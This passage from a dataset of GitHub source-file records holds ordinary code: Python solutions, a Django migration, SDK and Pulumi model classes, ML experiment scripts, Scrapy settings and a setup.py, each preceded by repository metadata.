] | sdk-team@alibabacloud.com |
dae5b42382e8e74d2b2b579db2cbab17d24e21ff | 12a42054b156383ebbe3ccc5de4150633c66da5d | /problems/longest-consecutive-sequence/solution.py | bd284b649e4f30eb39ed840b85cb0b4ee6dcbb38 | [] | no_license | cfoust/leetcode-problems | 93c33029f74f32c64caf8294292226d199d6e272 | f5ad7866906d0a2cf2250e5972ce910bf35ce526 | refs/heads/master | 2020-03-16T23:05:45.123781 | 2018-05-11T16:41:09 | 2018-05-11T16:41:09 | 133,064,772 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | class Solution:
def longestConsecutive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
| [
"cfoust@sqweebloid.com"
] | cfoust@sqweebloid.com |
191648db5c4ce872041af42a900a4a429edc158e | 4eb2cac1b030a129a2ba4a156d5d1ccbf2d472bb | /fullcalendar/calendario/migrations/0003_auto_20161110_2030.py | 1f31a5bbe66d999a7be787fe6a483a72a7868238 | [] | no_license | CoutinhoElias/calendario | aba3899b10a31f1b6175c943480b4fe45398cb69 | 0d519f7fee242f8856a1d6cf55b03ba9b1bbbabf | refs/heads/master | 2020-12-22T09:05:20.403642 | 2016-11-11T19:00:00 | 2016-11-11T19:00:00 | 73,497,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-10 20:30
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('calendario', '0002_auto_20161110_2013'),
]
operations = [
migrations.RemoveField(
model_name='avaluo',
name='avaluo_id',
),
migrations.AddField(
model_name='avaluo',
name='Estatus',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='avaluo',
name='id',
field=models.AutoField(auto_created=True, default=1, primary_key=True, serialize=False, verbose_name='ID'),
preserve_default=False,
),
]
| [
"coutinho.elias@gmail.com"
] | coutinho.elias@gmail.com |
8d160ec784e313aa01c3b5a268ffa2e46ebb06d0 | 6c083d19a4e95a5b61637db8ec042ce4a338b6b0 | /python_mongo_crud/crud/positions.py | 8dbbfd1e0b18310219f42c2d4904b5c21c0830dc | [] | no_license | zeionara/barbershop | a0269e58bbd10a2f969f574f5c4296ba69aa09ca | e4600b7b5483b2692b0fbb6ba0f5b8dbbb839e01 | refs/heads/master | 2021-03-27T10:15:17.820736 | 2017-12-22T15:27:46 | 2017-12-22T15:27:46 | 110,250,691 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | import configparser
from connection import create_session
from ming import schema
from ming.odm import FieldProperty
from ming.odm.declarative import MappedClass
from commons import EnhancingClass
collection_name = 'positions'
config = configparser.ConfigParser()
config.read('C://Users//Zerbs//accounts.sec')
session = create_session(config['mongo']['login'], config['mongo']['password'], config['mongo']['path'])
class Position(MappedClass, EnhancingClass):
class __mongometa__:
session = session
name = collection_name
_id = FieldProperty(schema.ObjectId)
name = FieldProperty(schema.String(required=True))
description = FieldProperty(schema.String(if_missing = ''))
#position = Position(name = "General hairdresser")
session.flush_all()
| [
"zeionara@gmail.com"
] | zeionara@gmail.com |
2330592ed088ee598023957ab4a8652c45eddcc4 | da4c40f8f21b0813c9a935479c56230eddf71dd3 | /simple_rl/ltl-old/experiments/run_experiments.py | cc1af01de47102559286607165c2b55b9ebd459b | [] | no_license | h2r/ltl-amdp | f804bf4ad083dc9d7f0f960af535411b1cbc6f9a | 5aa3a4d6fa060b0e9f151c0efee45eea61c799d7 | refs/heads/master | 2022-07-22T07:52:37.719118 | 2019-08-29T06:16:32 | 2019-08-29T06:16:32 | 187,088,228 | 4 | 1 | null | 2022-06-21T21:59:20 | 2019-05-16T19:21:08 | Python | UTF-8 | Python | false | false | 8,040 | py | import time
import os
from simple_rl.ltl.AMDP.RoomCubePlainMDPClass import RoomCubePlainMDP
from simple_rl.ltl.AMDP.LtlAMDPClass import LTLAMDP
from simple_rl.ltl.settings.build_cube_env_1 import build_cube_env
from simple_rl.planning import ValueIteration
def run_plain_pMDP(init_loc, ltl_formula, cube_env, ap_maps, verbose=False):
start_time = time.time()
mdp = RoomCubePlainMDP(init_loc = init_loc, ltl_formula=ltl_formula, env_file=[cube_env],
ap_maps=ap_maps)
value_iter = ValueIteration(mdp, sample_rate=1, max_iterations=50)
value_iter.run_vi()
# Value Iteration
action_seq, state_seq = value_iter.plan(mdp.get_init_state())
computing_time = time.time() - start_time
# Print
if verbose:
print("=====================================================")
print("Plain: Plan for ", ltl_formula)
for i in range(len(action_seq)):
room_number, floor_number = mdp._get_abstract_number(state_seq[i])
print(
"\t {} in room {} on the floor {}, {}".format(state_seq[i], room_number, floor_number, action_seq[i]))
room_number, floor_number = mdp._get_abstract_number(state_seq[-1])
print("\t {} in room {} on the floor {}".format(state_seq[-1], room_number, floor_number))
# success?
if len(state_seq) <= 1:
flag_success = -1
else:
if mdp.automata.aut_spot.state_is_accepting(state_seq[-1].q):
flag_success = 1
else:
flag_success = 0
return computing_time, len(action_seq), flag_success, state_seq, action_seq, value_iter.get_num_backups_in_recent_run()
def run_aMDP(init_loc, ltl_formula, cube_env, ap_maps, verbose=False):
start_time = time.time()
ltl_amdp = LTLAMDP(ltl_formula, ap_maps, env_file=[cube_env], slip_prob=0.0, verbose=verbose)
# ltl_amdp.solve_debug()
sseq, aseq, len_actions, backup_num = ltl_amdp.solve(init_loc)
computing_time = time.time() - start_time
# success?
if len_actions == 0:# or len(sseq) == 0:
flag_success = -1
#len_actions = 0
else:
if sseq[-1][-1].q == 1:
flag_success = 1
else:
flag_success = 0
return computing_time, len_actions, flag_success, sseq, aseq, backup_num
def run_aMDP_lowest(init_loc, ltl_formula, cube_env, ap_maps, verbose=False):
start_time = time.time()
ltl_amdp = LTLAMDP(ltl_formula, ap_maps, env_file=[cube_env], slip_prob=0.0, verbose=verbose)
# ltl_amdp.solve_debug()
sseq, aseq, len_actions, backup_num = ltl_amdp.solve(init_loc, FLAG_LOWEST=True)
computing_time = time.time() - start_time
# success?
if len_actions == 0:
flag_success = -1
else:
if sseq[-1][-1].q == 1:
flag_success = 1
else:
flag_success = 0
return computing_time, len_actions, flag_success, sseq, aseq, backup_num
if __name__ == '__main__':
cube_env1 = build_cube_env()
# define scenarios for a large environment
formula_set1 = ['Fa', 'F (a & F b)', 'F(a & F( b & Fc))', '~a U b', 'F (a & F b)','F(a & F( b & Fc))']
ap_maps_set1 = {}
ap_maps_set1[0] = {'a': [2, 'state', 3]}
ap_maps_set1[1] = {'a': [0, 'state', (2,4,1)], 'b': [1,'state', 7]}
ap_maps_set1[2] = {'a': [1, 'state', 9], 'b': [2, 'state', 3], 'c': [1, 'state', 17]}
ap_maps_set1[3] = {'a': [1, 'state', 2], 'b': [2, 'state', 3]}
ap_maps_set1[4] = {'a': [1, 'state', 9], 'b': [1, 'state', 17]}
ap_maps_set1[5] = {'c': [0, 'state', (1, 4, 3)], 'a': [2, 'state', 1], 'b': [2, 'state', 2]}
# define scenarios for a large environment
formula_set2 = ['Fa', 'Fa', 'F (a & F b)', '~a U b', 'F(a & F( b & F c))']
ap_maps_set2 = {}
ap_maps_set2[0] = {'a': [1, 'state', 8]}
ap_maps_set2[1] = {'a': [2, 'state', 6]}
ap_maps_set2[2] = {'a': [2, 'state', 4], 'b': [1, 'state', 6]}
ap_maps_set2[3] = {'a': [1, 'state', 11], 'b': [1, 'state', 12]}
ap_maps_set2[4] = {'a': [1, 'state', 5], 'b': [2, 'state', 3], 'c': [0, 'state', (11, 11, 3)]}
formula_set3 = ['Fa', '~a U b', 'F((a | b) & F c)', 'F (a & F b)']
ap_maps_set3 = {}
ap_maps_set3[0] = {'a': [2, 'state', 3]}
ap_maps_set3[1] = {'a': [1, 'state', 2], 'b': [2, 'state', 3]}
ap_maps_set3[2] = {'a': [2, 'state', 2], 'b': [1, 'state', 2], 'c': [2, 'state', 1]}
ap_maps_set3[3] = {'a': [2, 'state', 2], 'b': [1, 'state', 8]}
# simulation settings
run_num = 1.0 #the number of run
flag_verbose = False # Show result paths
flag_save = False
num_env = 1 #environment name : build_cube_env(num_env).py 3: for examples
init_loc = (1,1,1)
# select the world (1: small, 2: large cube world)
formula_set = eval("formula_set{}".format(num_env))
ap_maps_set = eval("ap_maps_set{}".format(num_env))
for num_case in [5]:
print("+++++++++++++++++ Case: {} +++++++++++++++++++".format(num_case))
if flag_save:
file = open("{}/results/result_time.txt".format(os.getcwd()), "a")
ltl_formula = formula_set[num_case]
ap_maps = ap_maps_set[num_case]
#initialize
run_time_plain = 0.0
run_time_amdp = 0.0
run_time_amdp_lowest = 0.0
run_len_plain = 0.0
run_len_amdp = 0.0
run_len_amdp_lowest = 0.0
for i in range(int(run_num)):
print("* Trial {}".format(i))
# Experiment: AMDP
print("[Trial {}] AP-MDP ----------------------------------------".format(i))
t, l, _, _,_, backup= run_aMDP(init_loc, ltl_formula, cube_env1, ap_maps, verbose=flag_verbose)
run_time_amdp = run_time_amdp + t
run_len_amdp = run_len_amdp + l
print(" [AP-MDP] Time: {} seconds, the number of actions: {}, backup: {}"
.format(round(t, 3), l, backup))
# Experiment: decomposed LTL and solve it at the lowest level
print("[Trial {}] AP-MDP at level 0 ----------------------------------------".format(i))
t, l, _, _,_, backup = run_aMDP_lowest(init_loc, ltl_formula, cube_env1, ap_maps, verbose=flag_verbose)
run_time_amdp_lowest = run_time_amdp_lowest + t
run_len_amdp_lowest = run_len_amdp_lowest + l
print(" [AP-MDP at level 0] Time: {} seconds, the number of actions: {}, backup: {}"
.format(round(t, 3), l, backup))
# Experiment: Plain MDP
print("[Trial {}] Plain ----------------------------------------".format(i))
t, l, _, _,_, backup = run_plain_pMDP(init_loc, ltl_formula, cube_env1, ap_maps, verbose=flag_verbose)
run_time_plain = run_time_plain + t
run_len_plain = run_len_plain + l
print(" [Plain] Time: {} seconds, the number of actions: {}, backup: {}"
.format(round(t, 3), l, backup))
print("* Summary: " + ltl_formula)
print(" AP-MDP: {}s, {}".format(round(run_time_amdp / run_num, 3), run_len_amdp / run_num))
print(" AP-MDP at level 0: {}s, {}".format(round(run_time_amdp_lowest / run_num, 3), run_len_amdp_lowest / run_num))
print(" Product-MDP: {}s, {}".format(round(run_time_plain / run_num, 3), run_len_plain / run_num))
if flag_save:
file.write("=== Env {} ==============================================\n".format(num_env))
file.write("Run {} times\n".format(run_num))
file.write("Task:\t"+ltl_formula+"\n")
file.write("AP:\t{}\n".format(ap_maps))
file.write("AP-MDP:\t{}s, {}\n".format(round(run_time_amdp / run_num, 3), run_len_amdp / run_num))
file.write("AP-MDP at level 0:\t{}s, {}\n".format(round(run_time_amdp_lowest / run_num, 3),
run_len_amdp_lowest / run_num))
file.write("Product-MDP:\t{}s, {}\n".format(round(run_time_plain / run_num, 3), run_len_plain / run_num))
file.close()
| [
"romapatel996@gmail.com"
] | romapatel996@gmail.com |
e5a1dedc7088d5109287a64cf316c8912507a8f1 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-dataartsstudio/huaweicloudsdkdataartsstudio/v1/model/show_apps_overview_response.py | 71c0824500634e0b099b139b6237cc2e18cf49b0 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 7,518 | py | # coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ShowAppsOverviewResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'apply_num': 'int',
'call_num': 'int',
'success_num': 'int',
'fail_num': 'int',
'legal_num': 'int',
'illegal_num': 'int'
}
attribute_map = {
'apply_num': 'apply_num',
'call_num': 'call_num',
'success_num': 'success_num',
'fail_num': 'fail_num',
'legal_num': 'legal_num',
'illegal_num': 'illegal_num'
}
def __init__(self, apply_num=None, call_num=None, success_num=None, fail_num=None, legal_num=None, illegal_num=None):
"""ShowAppsOverviewResponse
The model defined in huaweicloud sdk
:param apply_num: 申请量
:type apply_num: int
:param call_num: 调用总量
:type call_num: int
:param success_num: 成功调用量(取数成功)
:type success_num: int
:param fail_num: 失败调用量(取数失败)
:type fail_num: int
:param legal_num: 合法调用量(通过校验)
:type legal_num: int
:param illegal_num: 非法调用量(无法通过校验)
:type illegal_num: int
"""
super(ShowAppsOverviewResponse, self).__init__()
self._apply_num = None
self._call_num = None
self._success_num = None
self._fail_num = None
self._legal_num = None
self._illegal_num = None
self.discriminator = None
if apply_num is not None:
self.apply_num = apply_num
if call_num is not None:
self.call_num = call_num
if success_num is not None:
self.success_num = success_num
if fail_num is not None:
self.fail_num = fail_num
if legal_num is not None:
self.legal_num = legal_num
if illegal_num is not None:
self.illegal_num = illegal_num
@property
def apply_num(self):
"""Gets the apply_num of this ShowAppsOverviewResponse.
申请量
:return: The apply_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._apply_num
@apply_num.setter
def apply_num(self, apply_num):
"""Sets the apply_num of this ShowAppsOverviewResponse.
申请量
:param apply_num: The apply_num of this ShowAppsOverviewResponse.
:type apply_num: int
"""
self._apply_num = apply_num
@property
def call_num(self):
"""Gets the call_num of this ShowAppsOverviewResponse.
调用总量
:return: The call_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._call_num
@call_num.setter
def call_num(self, call_num):
"""Sets the call_num of this ShowAppsOverviewResponse.
调用总量
:param call_num: The call_num of this ShowAppsOverviewResponse.
:type call_num: int
"""
self._call_num = call_num
@property
def success_num(self):
"""Gets the success_num of this ShowAppsOverviewResponse.
成功调用量(取数成功)
:return: The success_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._success_num
@success_num.setter
def success_num(self, success_num):
"""Sets the success_num of this ShowAppsOverviewResponse.
成功调用量(取数成功)
:param success_num: The success_num of this ShowAppsOverviewResponse.
:type success_num: int
"""
self._success_num = success_num
@property
def fail_num(self):
"""Gets the fail_num of this ShowAppsOverviewResponse.
失败调用量(取数失败)
:return: The fail_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._fail_num
@fail_num.setter
def fail_num(self, fail_num):
"""Sets the fail_num of this ShowAppsOverviewResponse.
失败调用量(取数失败)
:param fail_num: The fail_num of this ShowAppsOverviewResponse.
:type fail_num: int
"""
self._fail_num = fail_num
@property
def legal_num(self):
"""Gets the legal_num of this ShowAppsOverviewResponse.
合法调用量(通过校验)
:return: The legal_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._legal_num
@legal_num.setter
def legal_num(self, legal_num):
"""Sets the legal_num of this ShowAppsOverviewResponse.
合法调用量(通过校验)
:param legal_num: The legal_num of this ShowAppsOverviewResponse.
:type legal_num: int
"""
self._legal_num = legal_num
@property
def illegal_num(self):
"""Gets the illegal_num of this ShowAppsOverviewResponse.
非法调用量(无法通过校验)
:return: The illegal_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._illegal_num
@illegal_num.setter
def illegal_num(self, illegal_num):
"""Sets the illegal_num of this ShowAppsOverviewResponse.
非法调用量(无法通过校验)
:param illegal_num: The illegal_num of this ShowAppsOverviewResponse.
:type illegal_num: int
"""
self._illegal_num = illegal_num
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowAppsOverviewResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
0069f78905351db695975fbd72ebc1b5ae332d60 | 9b9b6a7aa1de1092a8480771f2b08ffa0972218d | /python/sklearn/linear-regression/workload-analysis/classify/online/params/param_counter.py | 1af00ac73271adc2c5101bc6c3e24af7064e2cb7 | [
"WTFPL"
] | permissive | lijiansong/lang | c42ca757306b38f37a26fef841b2460f05a13af6 | 27ffecd9afe67ddac003fc4d6333e06e2cc20434 | refs/heads/master | 2023-02-25T17:36:01.221720 | 2023-02-14T14:10:29 | 2023-02-14T14:10:29 | 149,586,739 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 825 | py | import caffe
from numpy import prod, sum
from pprint import pprint
import os
def print_param_info(net_name, net_file):
net = caffe.Net(net_file, caffe.TEST)
print('Layer-wise params:')
pprint([(k, v[0].data.shape) for k, v in net.params.items()])
print('--> {} total number of params: {}'.format(net_name, sum([prod(v[0].data.shape) for k, v in net.params.items()])/1024.0/1024.0))
if __name__ == '__main__':
net_list = ['mobilenet_v2-github', 'mobilenet', 'squeezenet', 'densenet121', 'resnet50', 'ssd_mobilenetv1', 'ssd_vgg16']
for net in net_list:
net_file_blob = net + '/' + net + '_float16_dense_1batch.prototxt'
if not os.path.exists(net_file_blob):
print('{} NOT exists!!!'.format(net_file_blob))
exit(-1)
print_param_info(net, net_file_blob)
| [
"lijiansong@ict.ac.cn"
] | lijiansong@ict.ac.cn |
28691a0f6566ba2f43a980db581c0b15aacf756e | 34e44059f187d9064959842ef8b6a8526e0db431 | /pariba/settings.py | 25791709cfaaa0939a65be86a085476062311b53 | [] | no_license | SimeonYS/pariba | f682285d3a370468b2612fb02af3e2ef7b51be51 | af662fb20d5f33d45915062180f4481fa014d18a | refs/heads/main | 2023-03-07T07:26:18.513902 | 2021-02-26T11:39:15 | 2021-02-26T11:39:15 | 342,557,708 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | BOT_NAME = 'pariba'
SPIDER_MODULES = ['pariba.spiders']
NEWSPIDER_MODULE = 'pariba.spiders'
FEED_EXPORT_ENCODING = 'utf-8'
LOG_LEVEL = 'ERROR'
DOWNLOAD_DELAY = 0
USER_AGENT="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36"
ROBOTSTXT_OBEY = True
ITEM_PIPELINES = {
'pariba.pipelines.ParibaPipeline': 300,
} | [
"simeon.simeonov@ADPVT.com"
] | simeon.simeonov@ADPVT.com |
21da94d8fe23dc14ad9e002afb37fa79fa9265db | 808eb8f2ae19d78531d2179d28aa1bc569b87a7d | /setup.py | 79722097e9aa60945975738c3bbfa496e741002f | [
"BSD-3-Clause"
] | permissive | huangjundashuaige/elastic | b59f5143fbc28291500e441bba824d532947ffc7 | 9e0b6abc87a5cb6c0ece2d630d3bdb812682ba45 | refs/heads/master | 2022-12-07T05:26:40.370489 | 2020-09-04T05:30:51 | 2020-09-04T05:32:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,241 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import os
import re
import sys
from setuptools import find_packages, setup
def get_version():
# get version string from version.py
# TODO: ideally the version.py should be generated when setup is run
version_file = os.path.join(os.path.dirname(__file__), "torchelastic/version.py")
version_regex = r"__version__ = ['\"]([^'\"]*)['\"]"
with open(version_file, "r") as f:
version = re.search(version_regex, f.read(), re.M).group(1)
return version
if __name__ == "__main__":
if sys.version_info < (3, 8):
sys.exit("python >= 3.8 required for torchelastic")
with open("README.md", encoding="utf8") as f:
readme = f.read()
with open("requirements.txt") as f:
reqs = f.read()
version = get_version()
print("-- Building version: " + version)
setup(
# Metadata
name="torchelastic",
version=version,
author="PyTorch Elastic Devs",
author_email="torchelastic@fb.com",
description="PyTorch Elastic Training",
long_description=readme,
long_description_content_type="text/markdown",
url="https://github.com/pytorch/elastic",
license="BSD-3",
keywords=["pytorch", "machine learning", "elastic", "distributed"],
python_requires=">=3.6",
install_requires=reqs.strip().split("\n"),
include_package_data=True,
packages=find_packages(exclude=("test", "test.*")),
test_suite="test.suites.unittests",
# PyPI package information.
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Topic :: System :: Distributed Computing",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
0631bc7566c1dfbeee8db0e84fcf39ae79453c92 | 181af10fcf40b824fe92d3b8f72fd15d6d1490c2 | /Medium/144. Binary Tree Preorder Traversal/Binary Tree Preorder Traversal.py | caf9c234794d2dbc9002cb5f15b5547ac17fe488 | [] | no_license | wangyendt/LeetCode | 402c59a0b7b7f5b3a672231ea5dad8056ade36af | 4a3ba15284c45b2d8bf38306c8c8526ae174615c | refs/heads/master | 2023-08-10T06:27:54.995152 | 2023-08-10T02:22:27 | 2023-08-10T02:22:27 | 176,651,399 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | #!/usr/bin/env python
# encoding: utf-8
"""
@author: Wayne
@contact: wangye.hope@gmail.com
@software: PyCharm
@file: Binary Tree Preorder Traversal
@time: 2019/8/22 17:55
"""
import sys
sys.path.append('..')
from Tools.BinaryTree import *
class Solution:
def preorderTraversal(self, root: TreeNode) -> list:
ret = []
if not root: return ret
stack = [root]
while stack:
s = stack.pop()
ret.append(s.val)
if s.right:
stack.append(s.right)
if s.left:
stack.append(s.left)
return ret
so = Solution()
tree = parseTreeNode([1, 2, 3, 4, 5, 6, 7])
print(so.preorderTraversal(tree))
| [
"905317742@qq.com"
] | 905317742@qq.com |
47f47d17d3d69a25285ce3e88fbb0277e9f7b490 | 5bd49cdbd0dd04af74a98b96aba3a936512f40c9 | /datasetCode/resize_dataset.py | 5885e7fab30c69cac2e8e36f2d7780e41ab09c94 | [] | no_license | gombru/instaEmotions | fd78ca7a27ccd868bea239b98d5a8db895d945f8 | 94c0b69096e6aeb0c187aac8d76db49e379f9bc7 | refs/heads/master | 2021-05-09T23:21:14.938278 | 2018-02-13T08:25:19 | 2018-02-13T08:25:19 | 118,780,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,965 | py | # Resizes the images in a folder and creates a resized datasetcd in another
# It also filters corrupted images
import glob
from PIL import Image
from joblib import Parallel, delayed
import os
from shutil import copyfile
import time
json_filtered_path = "../../../hd/datasets/instaEmotions/json_filtered/"
im_dest_path = "../../../hd/datasets/instaEmotions/img_resized/"
minSize = 256
def resize(file):
try:
im_file = file.replace('json_filtered','img').replace('json','jpg')
im = Image.open(im_file)
w = im.size[0]
h = im.size[1]
# print "Original w " + str(w)
# print "Original h " + str(h)
if w < h:
new_width = minSize
new_height = int(minSize * (float(h) / w))
if h <= w:
new_height = minSize
new_width = int(minSize * (float(w) / h))
# print "New width "+str(new_width)
# print "New height "+str(new_height)
im = im.resize((new_width, new_height), Image.ANTIALIAS)
if not os.path.exists(im_dest_path + im_file.split('/')[-2]):
os.makedirs(im_dest_path + im_file.split('/')[-2])
im.save(im_dest_path + im_file.split('/')[-2] + '/' + im_file.split('/')[-1])
except:
print "Failed copying image. Removing caption " + str(file)
try:
# os.remove(file.replace("img", "json").replace("jpg", "json"))
os.remove(file)
# os.remove(file.replace("img", "json_filtered").replace("jpg", "json"))
except:
print "Cannot remove " + str(file)
return
print "Removed"
return
if not os.path.exists(im_dest_path):
os.makedirs(im_dest_path)
dirs = [dI for dI in os.listdir(json_filtered_path) if os.path.isdir(os.path.join(json_filtered_path, dI))]
c = 0
for dir in dirs:
print dir
Parallel(n_jobs=12)(delayed(resize)(file) for file in glob.glob(json_filtered_path + dir + "/*.json")) | [
"raulgombru@gmail.com"
] | raulgombru@gmail.com |
76527e924164481f7266a0971135b8d4ce87e829 | d66aa4c77f65bb837e07626c696b6dc886c7b1c1 | /base/Chapter-9/Chapter-9-3/Chapter-9-3.py | b9b07535566362568d6657934bc76850d1527ebf | [] | no_license | silianpan/Excel_to_Python | 2a789aec0eb38d3178be6dd44205792624d0d4c4 | 1c5890988c99b2939c4d98bb6a881e15d6c3ad7d | refs/heads/master | 2021-07-09T00:25:54.665343 | 2021-05-04T11:25:18 | 2021-05-04T11:25:18 | 242,090,461 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | # 自定义函数。
def level(number,lv1,lv2,lv3):
if number>=90:
return lv1
elif number>=60:
return lv2
elif number>=0:
return lv3
# 自定义函数的调用。
for score in [95,63,58,69,41,88,96]:
print(score,level(score,'优','中','差')) | [
"liu.pan@silianpan.cn"
] | liu.pan@silianpan.cn |
77cebbb34a0206d63b09f11451825731950f316b | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/scheduler/latest/get_job_collection.py | 01c4ede4ea20f274e912f4161ff2a78f9a16fe18 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 3,835 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetJobCollectionResult',
'AwaitableGetJobCollectionResult',
'get_job_collection',
]
@pulumi.output_type
class GetJobCollectionResult:
def __init__(__self__, location=None, name=None, properties=None, tags=None, type=None):
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Gets or sets the storage account location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Gets or sets the job collection resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> 'outputs.JobCollectionPropertiesResponse':
"""
Gets or sets the job collection properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Gets or sets the tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Gets the job collection resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetJobCollectionResult(GetJobCollectionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetJobCollectionResult(
location=self.location,
name=self.name,
properties=self.properties,
tags=self.tags,
type=self.type)
def get_job_collection(job_collection_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetJobCollectionResult:
"""
Use this data source to access information about an existing resource.
:param str job_collection_name: The job collection name.
:param str resource_group_name: The resource group name.
"""
__args__ = dict()
__args__['jobCollectionName'] = job_collection_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:scheduler/latest:getJobCollection', __args__, opts=opts, typ=GetJobCollectionResult).value
return AwaitableGetJobCollectionResult(
location=__ret__.location,
name=__ret__.name,
properties=__ret__.properties,
tags=__ret__.tags,
type=__ret__.type)
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
4cd64a5900987513454fab8e412bc4c1b59e5930 | 9588581462e70c0fd8728da13771cc72dbb9691e | /src/python/interpret/test/test_interactive.py | 84126bedf8fa54bb79bee7d7aa223ce4414ea308 | [
"MIT"
] | permissive | anshuman-unilu/interpret | df88a34433e0fc82ea697109afbf56799c886068 | 79d4afe441e8f153ef13313d81b3dd0a09361be1 | refs/heads/master | 2020-05-24T07:40:18.372789 | 2019-05-16T23:31:44 | 2019-05-16T23:31:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 588 | py | # Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license
from ..visual.interactive import set_show_addr, get_show_addr, shutdown_show_server
def test_shutdown():
target_addr = ("127.0.0.1", 1337)
set_show_addr(target_addr)
actual_response = shutdown_show_server()
expected_response = True
assert actual_response == expected_response
